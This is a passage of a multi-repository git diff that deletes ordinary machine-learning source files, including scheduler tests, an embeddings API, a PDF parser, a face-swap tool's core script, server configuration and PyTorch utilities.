num_inference_steps in [1, 2, 3, 5, 10, 50, 100, 999, 1000]: - self.check_over_forward(num_inference_steps=num_inference_steps, time_step=0) - - def test_full_loop_no_noise(self): - sample = self.full_loop() - result_mean = torch.mean(torch.abs(sample)) - - assert abs(result_mean.item() - 0.3301) < 1e-3 - - def test_full_loop_no_noise_thres(self): - sample = self.full_loop(thresholding=True, dynamic_thresholding_ratio=0.87, sample_max_value=0.5) - result_mean = torch.mean(torch.abs(sample)) - - assert abs(result_mean.item() - 1.1364) < 1e-3 - - def test_full_loop_with_v_prediction(self): - sample = self.full_loop(prediction_type="v_prediction") - result_mean = torch.mean(torch.abs(sample)) - - assert abs(result_mean.item() - 0.2251) < 1e-3 - - def test_full_loop_with_karras_and_v_prediction(self): - sample = self.full_loop(prediction_type="v_prediction", use_karras_sigmas=True) - result_mean = torch.mean(torch.abs(sample)) - - assert abs(result_mean.item() - 0.2096) < 1e-3 - - def test_switch(self): - # make sure that iterating over schedulers with same config names gives same results - # for defaults - scheduler = DPMSolverMultistepScheduler(**self.get_scheduler_config()) - sample = self.full_loop(scheduler=scheduler) - result_mean = torch.mean(torch.abs(sample)) - - assert abs(result_mean.item() - 0.3301) < 1e-3 - - scheduler = DPMSolverSinglestepScheduler.from_config(scheduler.config) - scheduler = UniPCMultistepScheduler.from_config(scheduler.config) - scheduler = DEISMultistepScheduler.from_config(scheduler.config) - scheduler = DPMSolverMultistepScheduler.from_config(scheduler.config) - - sample = self.full_loop(scheduler=scheduler) - result_mean = torch.mean(torch.abs(sample)) - - assert abs(result_mean.item() - 0.3301) < 1e-3 - - def test_fp16_support(self): - scheduler_class = self.scheduler_classes[0] - scheduler_config = self.get_scheduler_config(thresholding=True, dynamic_thresholding_ratio=0) - scheduler = scheduler_class(**scheduler_config) - - num_inference_steps = 10 - model = self.dummy_model() - sample = self.dummy_sample_deter.half() - scheduler.set_timesteps(num_inference_steps) - - for i, t in enumerate(scheduler.timesteps): - residual = model(sample, t) - sample = scheduler.step(residual, t, sample).prev_sample - - assert sample.dtype == torch.float16 - - def test_unique_timesteps(self, **config): - for scheduler_class in self.scheduler_classes: - scheduler_config = self.get_scheduler_config(**config) - scheduler = scheduler_class(**scheduler_config) - - scheduler.set_timesteps(scheduler.config.num_train_timesteps) - assert len(scheduler.timesteps.unique()) == scheduler.num_inference_steps diff --git a/spaces/AnimalEquality/chatbot/lv_recipe_chatbot/edamam_api.py b/spaces/AnimalEquality/chatbot/lv_recipe_chatbot/edamam_api.py deleted file mode 100644 index 6c51200b7d2140e52fbd5ab0dd805aadf8c60af6..0000000000000000000000000000000000000000 --- a/spaces/AnimalEquality/chatbot/lv_recipe_chatbot/edamam_api.py +++ /dev/null @@ -1,8 +0,0 @@ -# AUTOGENERATED! DO NOT EDIT! File to edit: ../nbs/04_edamam_api.ipynb. 
- -# %% auto 0 -__all__ = ['foo'] - -# %% ../nbs/04_edamam_api.ipynb 3 -def foo(): - pass diff --git a/spaces/AnishKumbhar/ChatBot/text-generation-webui-main/extensions/openai/embeddings.py b/spaces/AnishKumbhar/ChatBot/text-generation-webui-main/extensions/openai/embeddings.py deleted file mode 100644 index 96f44d91d7d5ae5fd78b39b18ce7bdfe54c84c4e..0000000000000000000000000000000000000000 --- a/spaces/AnishKumbhar/ChatBot/text-generation-webui-main/extensions/openai/embeddings.py +++ /dev/null @@ -1,80 +0,0 @@ -import os - -import numpy as np -from extensions.openai.errors import ServiceUnavailableError -from extensions.openai.utils import debug_msg, float_list_to_base64 -from sentence_transformers import SentenceTransformer - -embeddings_params_initialized = False -# using 'lazy loading' to avoid circular import -# so this function will be executed only once -def initialize_embedding_params(): - global embeddings_params_initialized - if not embeddings_params_initialized: - global st_model, embeddings_model, embeddings_device - from extensions.openai.script import params - st_model = os.environ.get("OPENEDAI_EMBEDDING_MODEL", params.get('embedding_model', 'all-mpnet-base-v2')) - embeddings_model = None - # OPENEDAI_EMBEDDING_DEVICE: auto (best or cpu), cpu, cuda, ipu, xpu, mkldnn, opengl, opencl, ideep, hip, ve, fpga, ort, xla, lazy, vulkan, mps, meta, hpu, mtia, privateuseone - embeddings_device = os.environ.get("OPENEDAI_EMBEDDING_DEVICE", params.get('embedding_device', 'cpu')) - if embeddings_device.lower() == 'auto': - embeddings_device = None - embeddings_params_initialized = True - - -def load_embedding_model(model: str) -> SentenceTransformer: - initialize_embedding_params() - global embeddings_device, embeddings_model - try: - embeddings_model = 'loading...' # flag - # see: https://www.sbert.net/docs/package_reference/SentenceTransformer.html#sentence_transformers.SentenceTransformer - emb_model = SentenceTransformer(model, device=embeddings_device) - # ... emb_model.device doesn't seem to work, always cpu anyways? 
but specify cpu anyways to free more VRAM - print(f"\nLoaded embedding model: {model} on {emb_model.device} [always seems to say 'cpu', even if 'cuda'], max sequence length: {emb_model.max_seq_length}") - except Exception as e: - embeddings_model = None - raise ServiceUnavailableError(f"Error: Failed to load embedding model: {model}", internal_message=repr(e)) - - return emb_model - - -def get_embeddings_model() -> SentenceTransformer: - initialize_embedding_params() - global embeddings_model, st_model - if st_model and not embeddings_model: - embeddings_model = load_embedding_model(st_model) # lazy load the model - return embeddings_model - - -def get_embeddings_model_name() -> str: - initialize_embedding_params() - global st_model - return st_model - - -def get_embeddings(input: list) -> np.ndarray: - return get_embeddings_model().encode(input, convert_to_numpy=True, normalize_embeddings=True, convert_to_tensor=False, device=embeddings_device) - - -def embeddings(input: list, encoding_format: str) -> dict: - - embeddings = get_embeddings(input) - - if encoding_format == "base64": - data = [{"object": "embedding", "embedding": float_list_to_base64(emb), "index": n} for n, emb in enumerate(embeddings)] - else: - data = [{"object": "embedding", "embedding": emb.tolist(), "index": n} for n, emb in enumerate(embeddings)] - - response = { - "object": "list", - "data": data, - "model": st_model, # return the real model - "usage": { - "prompt_tokens": 0, - "total_tokens": 0, - } - } - - debug_msg(f"Embeddings return size: {len(embeddings[0])}, number: {len(embeddings)}") - - return response diff --git a/spaces/Anonymous-sub/Rerender/gmflow_module/gmflow/position.py b/spaces/Anonymous-sub/Rerender/gmflow_module/gmflow/position.py deleted file mode 100644 index 14a6da436c818b7c2784e92dba66f7947d34b7ce..0000000000000000000000000000000000000000 --- a/spaces/Anonymous-sub/Rerender/gmflow_module/gmflow/position.py +++ /dev/null @@ -1,46 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved -# https://github.com/facebookresearch/detr/blob/main/models/position_encoding.py - -import torch -import torch.nn as nn -import math - - -class PositionEmbeddingSine(nn.Module): - """ - This is a more standard version of the position embedding, very similar to the one - used by the Attention is all you need paper, generalized to work on images. 
- """ - - def __init__(self, num_pos_feats=64, temperature=10000, normalize=True, scale=None): - super().__init__() - self.num_pos_feats = num_pos_feats - self.temperature = temperature - self.normalize = normalize - if scale is not None and normalize is False: - raise ValueError("normalize should be True if scale is passed") - if scale is None: - scale = 2 * math.pi - self.scale = scale - - def forward(self, x): - # x = tensor_list.tensors # [B, C, H, W] - # mask = tensor_list.mask # [B, H, W], input with padding, valid as 0 - b, c, h, w = x.size() - mask = torch.ones((b, h, w), device=x.device) # [B, H, W] - y_embed = mask.cumsum(1, dtype=torch.float32) - x_embed = mask.cumsum(2, dtype=torch.float32) - if self.normalize: - eps = 1e-6 - y_embed = y_embed / (y_embed[:, -1:, :] + eps) * self.scale - x_embed = x_embed / (x_embed[:, :, -1:] + eps) * self.scale - - dim_t = torch.arange(self.num_pos_feats, dtype=torch.float32, device=x.device) - dim_t = self.temperature ** (2 * (dim_t // 2) / self.num_pos_feats) - - pos_x = x_embed[:, :, :, None] / dim_t - pos_y = y_embed[:, :, :, None] / dim_t - pos_x = torch.stack((pos_x[:, :, :, 0::2].sin(), pos_x[:, :, :, 1::2].cos()), dim=4).flatten(3) - pos_y = torch.stack((pos_y[:, :, :, 0::2].sin(), pos_y[:, :, :, 1::2].cos()), dim=4).flatten(3) - pos = torch.cat((pos_y, pos_x), dim=3).permute(0, 3, 1, 2) - return pos diff --git a/spaces/Anthony7906/MengHuiMXD_GPT/modules/pdf_func.py b/spaces/Anthony7906/MengHuiMXD_GPT/modules/pdf_func.py deleted file mode 100644 index 0aba6b7b891fc527c79b887256b0cbaa81ae5b3d..0000000000000000000000000000000000000000 --- a/spaces/Anthony7906/MengHuiMXD_GPT/modules/pdf_func.py +++ /dev/null @@ -1,180 +0,0 @@ -from types import SimpleNamespace -import pdfplumber -import logging -from llama_index import Document - -def prepare_table_config(crop_page): - """Prepare table查找边界, 要求page为原始page - - From https://github.com/jsvine/pdfplumber/issues/242 - """ - page = crop_page.root_page # root/parent - cs = page.curves + page.edges - def curves_to_edges(): - """See https://github.com/jsvine/pdfplumber/issues/127""" - edges = [] - for c in cs: - edges += pdfplumber.utils.rect_to_edges(c) - return edges - edges = curves_to_edges() - return { - "vertical_strategy": "explicit", - "horizontal_strategy": "explicit", - "explicit_vertical_lines": edges, - "explicit_horizontal_lines": edges, - "intersection_y_tolerance": 10, - } - -def get_text_outside_table(crop_page): - ts = prepare_table_config(crop_page) - if len(ts["explicit_vertical_lines"]) == 0 or len(ts["explicit_horizontal_lines"]) == 0: - return crop_page - - ### Get the bounding boxes of the tables on the page. 
- bboxes = [table.bbox for table in crop_page.root_page.find_tables(table_settings=ts)] - def not_within_bboxes(obj): - """Check if the object is in any of the table's bbox.""" - def obj_in_bbox(_bbox): - """See https://github.com/jsvine/pdfplumber/blob/stable/pdfplumber/table.py#L404""" - v_mid = (obj["top"] + obj["bottom"]) / 2 - h_mid = (obj["x0"] + obj["x1"]) / 2 - x0, top, x1, bottom = _bbox - return (h_mid >= x0) and (h_mid < x1) and (v_mid >= top) and (v_mid < bottom) - return not any(obj_in_bbox(__bbox) for __bbox in bboxes) - - return crop_page.filter(not_within_bboxes) -# 请使用 LaTeX 表达公式,行内公式以 $ 包裹,行间公式以 $$ 包裹 - -extract_words = lambda page: page.extract_words(keep_blank_chars=True, y_tolerance=0, x_tolerance=1, extra_attrs=["fontname", "size", "object_type"]) -# dict_keys(['text', 'x0', 'x1', 'top', 'doctop', 'bottom', 'upright', 'direction', 'fontname', 'size']) - -def get_title_with_cropped_page(first_page): - title = [] # 处理标题 - x0,top,x1,bottom = first_page.bbox # 获取页面边框 - - for word in extract_words(first_page): - word = SimpleNamespace(**word) - - if word.size >= 14: - title.append(word.text) - title_bottom = word.bottom - elif word.text == "Abstract": # 获取页面abstract - top = word.top - - user_info = [i["text"] for i in extract_words(first_page.within_bbox((x0,title_bottom,x1,top)))] - # 裁剪掉上半部分, within_bbox: full_included; crop: partial_included - return title, user_info, first_page.within_bbox((x0,top,x1,bottom)) - -def get_column_cropped_pages(pages, two_column=True): - new_pages = [] - for page in pages: - if two_column: - left = page.within_bbox((0, 0, page.width/2, page.height),relative=True) - right = page.within_bbox((page.width/2, 0, page.width, page.height), relative=True) - new_pages.append(left) - new_pages.append(right) - else: - new_pages.append(page) - - return new_pages - -def parse_pdf(filename, two_column = True): - level = logging.getLogger().level - if level == logging.getLevelName("DEBUG"): - logging.getLogger().setLevel("INFO") - - with pdfplumber.open(filename) as pdf: - title, user_info, first_page = get_title_with_cropped_page(pdf.pages[0]) - new_pages = get_column_cropped_pages([first_page] + pdf.pages[1:], two_column) - - chapters = [] - # tuple (chapter_name, [pageid] (start,stop), chapter_text) - create_chapter = lambda page_start,name_top,name_bottom: SimpleNamespace( - name=[], - name_top=name_top, - name_bottom=name_bottom, - record_chapter_name = True, - - page_start=page_start, - page_stop=None, - - text=[], - ) - cur_chapter = None - - # 按页遍历PDF文档 - for idx, page in enumerate(new_pages): - page = get_text_outside_table(page) - - # 按行遍历页面文本 - for word in extract_words(page): - word = SimpleNamespace(**word) - - # 检查行文本是否以12号字体打印,如果是,则将其作为新章节开始 - if word.size >= 11: # 出现chapter name - if cur_chapter is None: - cur_chapter = create_chapter(page.page_number, word.top, word.bottom) - elif not cur_chapter.record_chapter_name or (cur_chapter.name_bottom != cur_chapter.name_bottom and cur_chapter.name_top != cur_chapter.name_top): - # 不再继续写chapter name - cur_chapter.page_stop = page.page_number # stop id - chapters.append(cur_chapter) - # 重置当前chapter信息 - cur_chapter = create_chapter(page.page_number, word.top, word.bottom) - - # print(word.size, word.top, word.bottom, word.text) - cur_chapter.name.append(word.text) - else: - cur_chapter.record_chapter_name = False # chapter name 结束 - cur_chapter.text.append(word.text) - else: - # 处理最后一个章节 - cur_chapter.page_stop = page.page_number # stop id - chapters.append(cur_chapter) - - for i in chapters: - 
logging.info(f"section: {i.name} pages:{i.page_start, i.page_stop} word-count:{len(i.text)}") - logging.debug(" ".join(i.text)) - - title = " ".join(title) - user_info = " ".join(user_info) - text = f"Article Title: {title}, Information:{user_info}\n" - for idx, chapter in enumerate(chapters): - chapter.name = " ".join(chapter.name) - text += f"The {idx}th Chapter {chapter.name}: " + " ".join(chapter.text) + "\n" - - logging.getLogger().setLevel(level) - return Document(text=text, extra_info={"title": title}) - -BASE_POINTS = """ -1. Who are the authors? -2. What is the process of the proposed method? -3. What is the performance of the proposed method? Please note down its performance metrics. -4. What are the baseline models and their performances? Please note down these baseline methods. -5. What dataset did this paper use? -""" - -READING_PROMPT = """ -You are a researcher helper bot. You can help the user with research paper reading and summarizing. \n -Now I am going to send you a paper. You need to read it and summarize it for me part by part. \n -When you are reading, You need to focus on these key points:{} -""" - -READING_PROMT_V2 = """ -You are a researcher helper bot. You can help the user with research paper reading and summarizing. \n -Now I am going to send you a paper. You need to read it and summarize it for me part by part. \n -When you are reading, You need to focus on these key points:{}, - -And You need to generate a brief but informative title for this part. -Your return format: -- title: '...' -- summary: '...' -""" - -SUMMARY_PROMPT = "You are a researcher helper bot. Now you need to read the summaries of a research paper." - - -if __name__ == '__main__': - # Test code - z = parse_pdf("./build/test.pdf") - print(z["user_info"]) - print(z["title"]) \ No newline at end of file diff --git a/spaces/Apex-X/GODROOP/roop/core.py b/spaces/Apex-X/GODROOP/roop/core.py deleted file mode 100644 index d481e49a2e4920154bd19ea67436a6b9f2c14233..0000000000000000000000000000000000000000 --- a/spaces/Apex-X/GODROOP/roop/core.py +++ /dev/null @@ -1,215 +0,0 @@ -#!/usr/bin/env python3 - -import os -import sys -# single thread doubles cuda performance - needs to be set before torch import -if any(arg.startswith('--execution-provider') for arg in sys.argv): - os.environ['OMP_NUM_THREADS'] = '1' -# reduce tensorflow log level -os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' -import warnings -from typing import List -import platform -import signal -import shutil -import argparse -import torch -import onnxruntime -import tensorflow - -import roop.globals -import roop.metadata -import roop.ui as ui -from roop.predictor import predict_image, predict_video -from roop.processors.frame.core import get_frame_processors_modules -from roop.utilities import has_image_extension, is_image, is_video, detect_fps, create_video, extract_frames, get_temp_frame_paths, restore_audio, create_temp, move_temp, clean_temp, normalize_output_path - -if 'ROCMExecutionProvider' in roop.globals.execution_providers: - del torch - -warnings.filterwarnings('ignore', category=FutureWarning, module='insightface') -warnings.filterwarnings('ignore', category=UserWarning, module='torchvision') - - -def parse_args() -> None: - signal.signal(signal.SIGINT, lambda signal_number, frame: destroy()) - program = argparse.ArgumentParser(formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=100)) - program.add_argument('-s', '--source', help='select an source image', dest='source_path') - program.add_argument('-t', 
'--target', help='select an target image or video', dest='target_path') - program.add_argument('-o', '--output', help='select output file or directory', dest='output_path') - program.add_argument('--frame-processor', help='frame processors (choices: face_swapper, face_enhancer, ...)', dest='frame_processor', default=['face_swapper'], nargs='+') - program.add_argument('--keep-fps', help='keep original fps', dest='keep_fps', action='store_true', default=False) - program.add_argument('--keep-audio', help='keep original audio', dest='keep_audio', action='store_true', default=True) - program.add_argument('--keep-frames', help='keep temporary frames', dest='keep_frames', action='store_true', default=False) - program.add_argument('--many-faces', help='process every face', dest='many_faces', action='store_true', default=False) - program.add_argument('--video-encoder', help='adjust output video encoder', dest='video_encoder', default='libx264', choices=['libx264', 'libx265', 'libvpx-vp9']) - program.add_argument('--video-quality', help='adjust output video quality', dest='video_quality', type=int, default=18, choices=range(52), metavar='[0-51]') - program.add_argument('--max-memory', help='maximum amount of RAM in GB', dest='max_memory', type=int, default=suggest_max_memory()) - program.add_argument('--execution-provider', help='available execution provider (choices: cpu, ...)', dest='execution_provider', default=['cpu'], choices=suggest_execution_providers(), nargs='+') - program.add_argument('--execution-threads', help='number of execution threads', dest='execution_threads', type=int, default=suggest_execution_threads()) - program.add_argument('-v', '--version', action='version', version=f'{roop.metadata.name} {roop.metadata.version}') - - args = program.parse_args() - - roop.globals.source_path = args.source_path - roop.globals.target_path = args.target_path - roop.globals.output_path = normalize_output_path(roop.globals.source_path, roop.globals.target_path, args.output_path) - roop.globals.frame_processors = args.frame_processor - roop.globals.headless = args.source_path or args.target_path or args.output_path - roop.globals.keep_fps = args.keep_fps - roop.globals.keep_audio = args.keep_audio - roop.globals.keep_frames = args.keep_frames - roop.globals.many_faces = args.many_faces - roop.globals.video_encoder = args.video_encoder - roop.globals.video_quality = args.video_quality - roop.globals.max_memory = args.max_memory - roop.globals.execution_providers = decode_execution_providers(args.execution_provider) - roop.globals.execution_threads = args.execution_threads - - -def encode_execution_providers(execution_providers: List[str]) -> List[str]: - return [execution_provider.replace('ExecutionProvider', '').lower() for execution_provider in execution_providers] - - -def decode_execution_providers(execution_providers: List[str]) -> List[str]: - return [provider for provider, encoded_execution_provider in zip(onnxruntime.get_available_providers(), encode_execution_providers(onnxruntime.get_available_providers())) - if any(execution_provider in encoded_execution_provider for execution_provider in execution_providers)] - - -def suggest_max_memory() -> int: - if platform.system().lower() == 'darwin': - return 4 - return 16 - - -def suggest_execution_providers() -> List[str]: - return encode_execution_providers(onnxruntime.get_available_providers()) - - -def suggest_execution_threads() -> int: - if 'DmlExecutionProvider' in roop.globals.execution_providers: - return 1 - if 'ROCMExecutionProvider' in 
roop.globals.execution_providers: - return 1 - return 8 - - -def limit_resources() -> None: - # prevent tensorflow memory leak - gpus = tensorflow.config.experimental.list_physical_devices('GPU') - for gpu in gpus: - tensorflow.config.experimental.set_virtual_device_configuration(gpu, [ - tensorflow.config.experimental.VirtualDeviceConfiguration(memory_limit=1024) - ]) - # limit memory usage - if roop.globals.max_memory: - memory = roop.globals.max_memory * 1024 ** 3 - if platform.system().lower() == 'darwin': - memory = roop.globals.max_memory * 1024 ** 6 - if platform.system().lower() == 'windows': - import ctypes - kernel32 = ctypes.windll.kernel32 - kernel32.SetProcessWorkingSetSize(-1, ctypes.c_size_t(memory), ctypes.c_size_t(memory)) - else: - import resource - resource.setrlimit(resource.RLIMIT_DATA, (memory, memory)) - - -def release_resources() -> None: - if 'CUDAExecutionProvider' in roop.globals.execution_providers: - torch.cuda.empty_cache() - - -def pre_check() -> bool: - if sys.version_info < (3, 9): - update_status('Python version is not supported - please upgrade to 3.9 or higher.') - return False - if not shutil.which('ffmpeg'): - update_status('ffmpeg is not installed.') - return False - return True - - -def update_status(message: str, scope: str = 'ROOP.CORE') -> None: - print(f'[{scope}] {message}') - if not roop.globals.headless: - ui.update_status(message) - - -def start() -> None: - for frame_processor in get_frame_processors_modules(roop.globals.frame_processors): - if not frame_processor.pre_start(): - return - # process image to image - if has_image_extension(roop.globals.target_path): - if predict_image(roop.globals.target_path): - destroy() - shutil.copy2(roop.globals.target_path, roop.globals.output_path) - for frame_processor in get_frame_processors_modules(roop.globals.frame_processors): - update_status('Progressing...', frame_processor.NAME) - frame_processor.process_image(roop.globals.source_path, roop.globals.output_path, roop.globals.output_path) - frame_processor.post_process() - release_resources() - if is_image(roop.globals.target_path): - update_status('Processing to image succeed!') - else: - update_status('Processing to image failed!') - return - # process image to videos - if predict_video(roop.globals.target_path): - destroy() - update_status('Creating temp resources...') - create_temp(roop.globals.target_path) - update_status('Extracting frames...') - extract_frames(roop.globals.target_path) - temp_frame_paths = get_temp_frame_paths(roop.globals.target_path) - for frame_processor in get_frame_processors_modules(roop.globals.frame_processors): - update_status('Progressing...', frame_processor.NAME) - frame_processor.process_video(roop.globals.source_path, temp_frame_paths) - frame_processor.post_process() - release_resources() - # handles fps - if roop.globals.keep_fps: - update_status('Detecting fps...') - fps = detect_fps(roop.globals.target_path) - update_status(f'Creating video with {fps} fps...') - create_video(roop.globals.target_path, fps) - else: - update_status('Creating video with 30.0 fps...') - create_video(roop.globals.target_path) - # handle audio - if roop.globals.keep_audio: - if roop.globals.keep_fps: - update_status('Restoring audio...') - else: - update_status('Restoring audio might cause issues as fps are not kept...') - restore_audio(roop.globals.target_path, roop.globals.output_path) - else: - move_temp(roop.globals.target_path, roop.globals.output_path) - # clean and validate - clean_temp(roop.globals.target_path) - if 
is_video(roop.globals.target_path): - update_status('Processing to video succeed!') - else: - update_status('Processing to video failed!') - - -def destroy() -> None: - if roop.globals.target_path: - clean_temp(roop.globals.target_path) - quit() - - -def run() -> None: - parse_args() - if not pre_check(): - return - for frame_processor in get_frame_processors_modules(roop.globals.frame_processors): - if not frame_processor.pre_check(): - return - limit_resources() - if roop.globals.headless: - start() - else: - window = ui.init(start, destroy) - window.mainloop() diff --git a/spaces/Artrajz/vits-simple-api/gunicorn_config.py b/spaces/Artrajz/vits-simple-api/gunicorn_config.py deleted file mode 100644 index abce6691ba08903ecb6972ec79cf36c1298c4a8a..0000000000000000000000000000000000000000 --- a/spaces/Artrajz/vits-simple-api/gunicorn_config.py +++ /dev/null @@ -1,19 +0,0 @@ -import gc -import multiprocessing - -bind = "0.0.0.0:23456" -# workers = multiprocessing.cpu_count() -workers = 1 -preload_app = True - -# disable GC in master as early as possible -gc.disable() - -def when_ready(server): - # freeze objects after preloading app - gc.freeze() - print("Objects frozen in perm gen: ", gc.get_freeze_count()) - -def post_fork(server, worker): - # reenable GC on worker - gc.enable() \ No newline at end of file diff --git a/spaces/Ataturk-Chatbot/HuggingFaceChat/venv/lib/python3.11/site-packages/pip/_vendor/urllib3/contrib/_appengine_environ.py b/spaces/Ataturk-Chatbot/HuggingFaceChat/venv/lib/python3.11/site-packages/pip/_vendor/urllib3/contrib/_appengine_environ.py deleted file mode 100644 index 8765b907d70c4a530bc90dc88f24b3df73473b01..0000000000000000000000000000000000000000 --- a/spaces/Ataturk-Chatbot/HuggingFaceChat/venv/lib/python3.11/site-packages/pip/_vendor/urllib3/contrib/_appengine_environ.py +++ /dev/null @@ -1,36 +0,0 @@ -""" -This module provides means to detect the App Engine environment. -""" - -import os - - -def is_appengine(): - return is_local_appengine() or is_prod_appengine() - - -def is_appengine_sandbox(): - """Reports if the app is running in the first generation sandbox. - - The second generation runtimes are technically still in a sandbox, but it - is much less restrictive, so generally you shouldn't need to check for it. 
- see https://cloud.google.com/appengine/docs/standard/runtimes - """ - return is_appengine() and os.environ["APPENGINE_RUNTIME"] == "python27" - - -def is_local_appengine(): - return "APPENGINE_RUNTIME" in os.environ and os.environ.get( - "SERVER_SOFTWARE", "" - ).startswith("Development/") - - -def is_prod_appengine(): - return "APPENGINE_RUNTIME" in os.environ and os.environ.get( - "SERVER_SOFTWARE", "" - ).startswith("Google App Engine/") - - -def is_prod_appengine_mvms(): - """Deprecated.""" - return False diff --git a/spaces/Awesimo/jojogan/op/conv2d_gradfix.py b/spaces/Awesimo/jojogan/op/conv2d_gradfix.py deleted file mode 100644 index 05796d3386bddb92686524caa1412104a861a79a..0000000000000000000000000000000000000000 --- a/spaces/Awesimo/jojogan/op/conv2d_gradfix.py +++ /dev/null @@ -1,227 +0,0 @@ -import contextlib -import warnings - -import torch -from torch import autograd -from torch.nn import functional as F - -enabled = True -weight_gradients_disabled = False - - -@contextlib.contextmanager -def no_weight_gradients(): - global weight_gradients_disabled - - old = weight_gradients_disabled - weight_gradients_disabled = True - yield - weight_gradients_disabled = old - - -def conv2d(input, weight, bias=None, stride=1, padding=0, dilation=1, groups=1): - if could_use_op(input): - return conv2d_gradfix( - transpose=False, - weight_shape=weight.shape, - stride=stride, - padding=padding, - output_padding=0, - dilation=dilation, - groups=groups, - ).apply(input, weight, bias) - - return F.conv2d( - input=input, - weight=weight, - bias=bias, - stride=stride, - padding=padding, - dilation=dilation, - groups=groups, - ) - - -def conv_transpose2d( - input, - weight, - bias=None, - stride=1, - padding=0, - output_padding=0, - groups=1, - dilation=1, -): - if could_use_op(input): - return conv2d_gradfix( - transpose=True, - weight_shape=weight.shape, - stride=stride, - padding=padding, - output_padding=output_padding, - groups=groups, - dilation=dilation, - ).apply(input, weight, bias) - - return F.conv_transpose2d( - input=input, - weight=weight, - bias=bias, - stride=stride, - padding=padding, - output_padding=output_padding, - dilation=dilation, - groups=groups, - ) - - -def could_use_op(input): - if (not enabled) or (not torch.backends.cudnn.enabled): - return False - - if input.device.type != "cuda": - return False - - if any(torch.__version__.startswith(x) for x in ["1.7.", "1.8.", "1.9", "1.10"]): - return True - - warnings.warn( - f"conv2d_gradfix not supported on PyTorch {torch.__version__}. Falling back to torch.nn.functional.conv2d()." 
- ) - - return False - - -def ensure_tuple(xs, ndim): - xs = tuple(xs) if isinstance(xs, (tuple, list)) else (xs,) * ndim - - return xs - - -conv2d_gradfix_cache = dict() - - -def conv2d_gradfix( - transpose, weight_shape, stride, padding, output_padding, dilation, groups -): - ndim = 2 - weight_shape = tuple(weight_shape) - stride = ensure_tuple(stride, ndim) - padding = ensure_tuple(padding, ndim) - output_padding = ensure_tuple(output_padding, ndim) - dilation = ensure_tuple(dilation, ndim) - - key = (transpose, weight_shape, stride, padding, output_padding, dilation, groups) - if key in conv2d_gradfix_cache: - return conv2d_gradfix_cache[key] - - common_kwargs = dict( - stride=stride, padding=padding, dilation=dilation, groups=groups - ) - - def calc_output_padding(input_shape, output_shape): - if transpose: - return [0, 0] - - return [ - input_shape[i + 2] - - (output_shape[i + 2] - 1) * stride[i] - - (1 - 2 * padding[i]) - - dilation[i] * (weight_shape[i + 2] - 1) - for i in range(ndim) - ] - - class Conv2d(autograd.Function): - @staticmethod - def forward(ctx, input, weight, bias): - if not transpose: - out = F.conv2d(input=input, weight=weight, bias=bias, **common_kwargs) - - else: - out = F.conv_transpose2d( - input=input, - weight=weight, - bias=bias, - output_padding=output_padding, - **common_kwargs, - ) - - ctx.save_for_backward(input, weight) - - return out - - @staticmethod - def backward(ctx, grad_output): - input, weight = ctx.saved_tensors - grad_input, grad_weight, grad_bias = None, None, None - - if ctx.needs_input_grad[0]: - p = calc_output_padding( - input_shape=input.shape, output_shape=grad_output.shape - ) - grad_input = conv2d_gradfix( - transpose=(not transpose), - weight_shape=weight_shape, - output_padding=p, - **common_kwargs, - ).apply(grad_output, weight, None) - - if ctx.needs_input_grad[1] and not weight_gradients_disabled: - grad_weight = Conv2dGradWeight.apply(grad_output, input) - - if ctx.needs_input_grad[2]: - grad_bias = grad_output.sum((0, 2, 3)) - - return grad_input, grad_weight, grad_bias - - class Conv2dGradWeight(autograd.Function): - @staticmethod - def forward(ctx, grad_output, input): - op = torch._C._jit_get_operation( - "aten::cudnn_convolution_backward_weight" - if not transpose - else "aten::cudnn_convolution_transpose_backward_weight" - ) - flags = [ - torch.backends.cudnn.benchmark, - torch.backends.cudnn.deterministic, - torch.backends.cudnn.allow_tf32, - ] - grad_weight = op( - weight_shape, - grad_output, - input, - padding, - stride, - dilation, - groups, - *flags, - ) - ctx.save_for_backward(grad_output, input) - - return grad_weight - - @staticmethod - def backward(ctx, grad_grad_weight): - grad_output, input = ctx.saved_tensors - grad_grad_output, grad_grad_input = None, None - - if ctx.needs_input_grad[0]: - grad_grad_output = Conv2d.apply(input, grad_grad_weight, None) - - if ctx.needs_input_grad[1]: - p = calc_output_padding( - input_shape=input.shape, output_shape=grad_output.shape - ) - grad_grad_input = conv2d_gradfix( - transpose=(not transpose), - weight_shape=weight_shape, - output_padding=p, - **common_kwargs, - ).apply(grad_output, grad_grad_weight, None) - - return grad_grad_output, grad_grad_input - - conv2d_gradfix_cache[key] = Conv2d - - return Conv2d diff --git a/spaces/Awiny/Image2Paragraph/models/grit_src/third_party/CenterNet2/detectron2/data/datasets/cityscapes_panoptic.py b/spaces/Awiny/Image2Paragraph/models/grit_src/third_party/CenterNet2/detectron2/data/datasets/cityscapes_panoptic.py deleted file mode 
100644 index 48c136f1623261b079591065fec7c7fc38165076..0000000000000000000000000000000000000000 --- a/spaces/Awiny/Image2Paragraph/models/grit_src/third_party/CenterNet2/detectron2/data/datasets/cityscapes_panoptic.py +++ /dev/null @@ -1,187 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -import json -import logging -import os - -from detectron2.data import DatasetCatalog, MetadataCatalog -from detectron2.data.datasets.builtin_meta import CITYSCAPES_CATEGORIES -from detectron2.utils.file_io import PathManager - -""" -This file contains functions to register the Cityscapes panoptic dataset to the DatasetCatalog. -""" - - -logger = logging.getLogger(__name__) - - -def get_cityscapes_panoptic_files(image_dir, gt_dir, json_info): - files = [] - # scan through the directory - cities = PathManager.ls(image_dir) - logger.info(f"{len(cities)} cities found in '{image_dir}'.") - image_dict = {} - for city in cities: - city_img_dir = os.path.join(image_dir, city) - for basename in PathManager.ls(city_img_dir): - image_file = os.path.join(city_img_dir, basename) - - suffix = "_leftImg8bit.png" - assert basename.endswith(suffix), basename - basename = os.path.basename(basename)[: -len(suffix)] - - image_dict[basename] = image_file - - for ann in json_info["annotations"]: - image_file = image_dict.get(ann["image_id"], None) - assert image_file is not None, "No image {} found for annotation {}".format( - ann["image_id"], ann["file_name"] - ) - label_file = os.path.join(gt_dir, ann["file_name"]) - segments_info = ann["segments_info"] - - files.append((image_file, label_file, segments_info)) - - assert len(files), "No images found in {}".format(image_dir) - assert PathManager.isfile(files[0][0]), files[0][0] - assert PathManager.isfile(files[0][1]), files[0][1] - return files - - -def load_cityscapes_panoptic(image_dir, gt_dir, gt_json, meta): - """ - Args: - image_dir (str): path to the raw 